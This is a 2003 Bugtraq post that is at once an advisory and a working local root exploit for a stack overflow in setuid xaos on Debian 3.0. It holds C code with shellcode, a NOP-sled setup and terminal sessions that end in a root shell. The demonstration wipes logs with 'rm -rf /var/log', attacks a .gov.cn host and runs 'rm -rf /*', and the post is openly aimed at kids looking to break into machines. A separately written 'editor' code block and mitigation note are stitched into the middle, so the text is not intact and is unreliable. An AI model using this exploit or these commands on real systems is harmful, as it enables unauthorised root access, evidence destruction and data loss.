
List:       bugtraq
Subject:    BAZARR LOCAL ROOT AGAIN. HI GUYS. DONT READ THIS
From:       "bazarr () ziplip ! com" <bazarr () ziplip ! com>
Date:       2003-06-05 22:27:23

bazarr!
["bazarr-episode-4.c" (text/x-csrc)]

/* xaos <= 3.0-23 ? 0day local root xploit on debian 3.0 woody               */
/*      by: bazarr                                                           */
/*      bazarr@ziplip.com                                                    */
/*      bazarr episode #4                                                    *


*hendy* i dont build nests for da winter, cause i dont have no time for building nests

dis is da advisory and xploit at da same time for a local root hole in debian 3.0. 
if dave censor dis he out of his mind! dis my second local root xploit in a week!
when bugtraq be heading down south to county jail quick wid all da cross site scripting bugs and advisories for hoolio's ftpd servers (WHO DA HELL IS HOOLIO). lets be real about dis: advisories for non-popular software are a dime a dozen. i da first young boy to come around wid real advisories in many a months. so please gimmie small break.

i release more advisories den combined times dvdfairy has DoS'd phrack.ru

dats alot!

--- You have been kicked from #openbsd by Dianora
(I have been coding before you were even a glint in your fathers eye. go away)

dianora when i finish "da design and implementation of da 4.4bsd operating system" (A BOOK) i be back to challenge you on bsd kernel, den you have no choice but to let me stay and give me +v in #openbsd. thank you. (she kicked young 16-year-old boy out of channel for xposing remote hole in default install!)

ok lets take a look at the vendor info for xaos:

DESCRIPTION
       XaoS is a protable real-time interactive fractal zoomer/morpher. UNIX version works under X11, SVGA and text terminals. If you don't knwo what fractal is or you want to know more about XaoS features you should see animated tutorial. Run XaoS and press 'H' twice. It is much more fun than reading of boring manual page :) and it supports foregin languages. You might also read xaos.info file for some advanced stuff (like how to write animations and tutorials manually, port or extend XaoS, algorithms used etc.)

first thing dat i spot is spelling mistake please patch 'knwo' into 'no' asap.

so we know dat xaos is a program which you zoom around in when you get real stoned (seriously). lets get to da local root hole in xaos.

lets take a look at my terminal session wid xaos: 

c00l@debian:~/code/dump% ls -al xaos
ls: xaos: No such file or directory
c00l@debian:~/code/dump% #well it aint here so lemme get back to da irc
c00l@debian:~/code/dump% #wait a second! i got an idea
c00l@debian:~/code/dump% ls -al /usr/bin/xaos
-rwsr-xr-x    1 root     root       379324 Apr  3  2001 /usr/bin/xaos
c00l@debian:~/code/dump% #suid root?! dat mean if it xploited it will result in uid = 0
c00l@debian:~/code/dump% #what will i do now?

now what i be doin is dis, bear wid me here fellow security researchers (lcamtuf you able to keep up wid dis?). lets keep going into dis adventure, lets check if you be vulnerable

c00l@debian:~/code/dump% #ok now we be checking if dis xaos is vulnerable to 0day bug which i have discovered
c00l@debian:~/code/dump% /usr/bin/xaos -language `perl -e 'print "A"x2049'`
^C
c00l@debian:~/code/dump% #ok im not vulnerable i guess
c00l@debian:~/code/dump% #w8 i have an idea!
c00l@debian:~/code/dump% /usr/bin/xaos -language `perl -e 'print "A"x20049'`
Segmentation fault
c00l@debian:~/code/dump% #aww crap i be vulnerable, what now?


after auditing for many a days and many a nights to find dis bug i am still weary from all of it. so lemme try and keep on going through dis adventure wid xaos, lets try and xploit it dis time.

c00l@debian:~/code/dump% ./set #dis put shellcode in environment with many a 0x90 around it
[c00l:dump]$ /usr/bin/xaos -language `perl -e 'print "\x45\xfe\xff\xbf"x8096'` -display A
Segmentation fault
[c00l:dump]$ #its not xploitable i guess
[c00l:dump]$ #w8 i got an idea
[c00l:dump]$ /usr/bin/xaos -language `perl -e 'print "\x45\xfe\xff\xbf"x8096'` -display AA
Segmentation fault
[c00l:dump]$ /usr/bin/xaos -language `perl -e 'print "\x45\xfe\xff\xbf"x8096'` -display AAA
Segmentation fault
[c00l:dump]$ /usr/bin/xaos -language `perl -e 'print "\x45\xfe\xff\xbf"x8096'` -display AAAA
sh-2.05a# id ; uname -a
uid=1001(c00l) gid=1001(c00l) euid=0(root) groups=1001(c00l)
Linux debian 2.4.18 #2 SMP Tue Nov 5 21:10:53 EST 2002 i686 unknown
sh-2.05a# # I DID IT
sh-2.05a# exit
exit
[c00l:dump]$ #be ethical and just run uname ; id and exit, thanks!

woa dis be going too fast for some security researchers let me slow down and xplain dis.

xaos be doing something like dis wid its -language argument:

++++++++
char hoolio[4096]; // big as to not allow stack overflow

strcpy(hoolio, argv[i]); // secure
++++++++

but it is NOT secure, an attacker is able to overflow 'hoolio' wid his own data! strcpy() never look at da size of 'hoolio', so a -language argument of 4096 bytes or more run right past da end of it. den he overwrite da saved return address on da stack wid his own and den he execute a shell, wid euid 0 because xaos is suid root.
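What follows is an added example from the editor, not bazarr's code and not the xaos source: the unchecked strcpy() pattern described above placed next to a bounded version, and fed the two probe lengths from the terminal session earlier (2049 bytes, which ran until ^C, and 20049 bytes, which segfaulted). Only the 4096-byte buffer and the name hoolio come from the advisory; the function names, the split into separate functions and main() are assumptions made for the example. Comments use // only so the block can sit inside this file's comment block.

```c
// Added example (editor's code, not bazarr's and not xaos source). Assumed:
// the function names, the two-function split and main(); only the 4096-byte
// buffer and the name "hoolio" come from the advisory.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define LANG_BUF 4096

// What the advisory says xaos does with -language: no length check, so any
// argument of LANG_BUF bytes or more runs past hoolio into the saved frame
// pointer and return address. Kept for comparison only; never call it on
// untrusted input.
void set_language_unsafe(char *hoolio, const char *arg)
{
    strcpy(hoolio, arg);
}

// Bounded version: refuse anything that does not fit together with its NUL,
// instead of truncating silently, so an over-long -language is an error
// rather than a hole.
int set_language_safe(char *hoolio, size_t buflen, const char *arg)
{
    size_t n = strlen(arg);
    if (n >= buflen)
        return -1;
    memcpy(hoolio, arg, n + 1);
    return 0;
}

// Build an n-byte probe like `perl -e 'print "A"xN'`; the caller frees it.
char *make_probe(size_t n)
{
    char *p = malloc(n + 1);
    if (!p)
        abort();
    memset(p, 'A', n);
    p[n] = 0;
    return p;
}

// Feed an n-byte probe to the safe setter: 0 if accepted, -1 if refused.
int probe_safe(size_t n)
{
    char hoolio[LANG_BUF];
    char *p = make_probe(n);
    int rc = set_language_safe(hoolio, sizeof hoolio, p);
    free(p);
    return rc;
}

int main(void)
{
    // 2049 bytes fits (the ^C run); 20049 does not (the Segmentation fault run)
    printf("2049  -> %d\n", probe_safe(2049));
    printf("20049 -> %d\n", probe_safe(20049));
    return 0;
}
```

Compile with cc and run: the 2049-byte probe is accepted and the 20049-byte one refused, and so is anything from 4096 bytes up. One editor's note on mitigation, since the advisory gives none: the overflow only yields root because /usr/bin/xaos is installed setuid root, so on an installed system dropping that bit (chmod u-s /usr/bin/xaos) removes the privilege escalation without a patch, while the crash on an over-long -language remains.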

-------------
ENDING 

xaos is vulnerable to a stack buffer overflow which be yielding root privileges on debian 3.0 (w00dy)

-------------	
PATCH

see many a people dont understand dis issue, i am young highschool boy 
doing many a bleeding edge freelance security work for free, it not my job to provide patch and pamper you. but if you really dont want to get hacked with many a 0day xploits just dont go online and dont make fun of caddis cuz he be xploiting your ftpd in record time to rm you (seriously man).

-------------	
VENDORS NOTIFIED

none

-------------	
VENDORS VULNERABLE

debian 3.0 & unstable on default install!!!
FreeBSD x.x ports! 
OpenBSD x.x ports!
NetBSD x.x ports!!! 
anyone who installed xaos!

-------------
XPLOIT 

as i promised , dis is da xploit!. if my code looks hoodly poodly its cuz 
i have trouble programming after last nights crystal meth ride. 

demonstration:

[pan@****.kr]$ cc bazarr-episode-4.c
[pan@****.kr]$ ./a.out aaaa
[*] bazarr :)
sh-2.05a# id
uid=1003(pan) gid=1003(pan) euid=0(root) groups=1003(pan)
sh-2.05a# rm -rf /var/log 
sh-2.05a# cc b.c 
sh-2.05a# ./a.out -t 39 -h ****.xxtax.gov.cn -s 90 -b 
.... ..... .... .... .... ....
done. 
sh-2.05a# nc ****.xxtax.gov.cn 31337
sh: nc: command not found
sh-2.05a# rm -rf /* & exit

just compile and run!!! so user friendly it's not even funny!
the 'a's are stack padding for da xaos, try 1-4 'a's
woa hey i just made a fool of myself! i didn't need any stack padding there.

dis C-code is very complex , do not attempt to modify it. 

it is very user friendly though for da following groups:

1. 22 year old php programming cs students
2. younger kids looking to hack boxes! (I LOVE DIS GROUP)
3. professional security researchers to make money off highschool boy by using dis xploit on der clients and charging dem for it
4. elite lurking blackhat laughing at my codez! (I CANT SAY I LIKE DIS GROUP ALL DAT MUCH)

AND NOW THE WORLD'S FIRST 4 LINE ROOT XPLOIT PROGRAMMED IN C BY BAZARR

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* setuid(0); execve("/bin//sh", ["/bin//sh", NULL], NULL) */
char c[] = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80";

int main(int cc, char **a)
{
    char x[256];
    char b[72001];                          /* one byte more than before: b[sizeof(b)] = 0 used to write past the end */

    memset(b, 0x99, 72000);                 /* 0x99 (cltd) is harmless on x86, so it works as a sled */
    memcpy(b + 71968, c, sizeof(c) - 1);    /* shellcode sits in the last 32 bytes of the sled */
    b[72000] = 0;
    setenv("C", b, 1);                      /* xaos inherits C, which lands near the top of its stack */

    if (!a[1]) { printf("[*] bazarr :(\n"); exit(1); }

    /* -language: 8096 copies of an address inside the sled; -display: 1-4 bytes of padding to line them up with the saved eip */
    snprintf(x, sizeof x, "/usr/bin/xaos -language `perl -e 'print \"\x45\xfe\xfe\xbf\"x8096'` -display %s", a[1]);
    printf("[*] bazarr :)\n");
    system(x);
    return 0;
}

/* 


-------------
ADVANCE WARNING 

double free() bug in popular suid root application installed by default on debian 3.0 coming soon! remote xploit for debian application coming soon!

and so many more i cannot even list dem all(SERIOUSLY). 

16-year-old boy release more bugs in few weeks den your whole crew does in da last 5 years! i think most of you be a little bitter about dat and dats why some of you be anti bazarr. your company should stick to hoolio's ftpd server.

-------------
GREETS

sir hackalot - you cool man! you like the 2pac of hacking. what ever happened to you and PHAZE? it been awhile!

-------------
BYE

bye bye guys i gotta go feed the dog and work on math homework.

bye.

-bazarr


*/



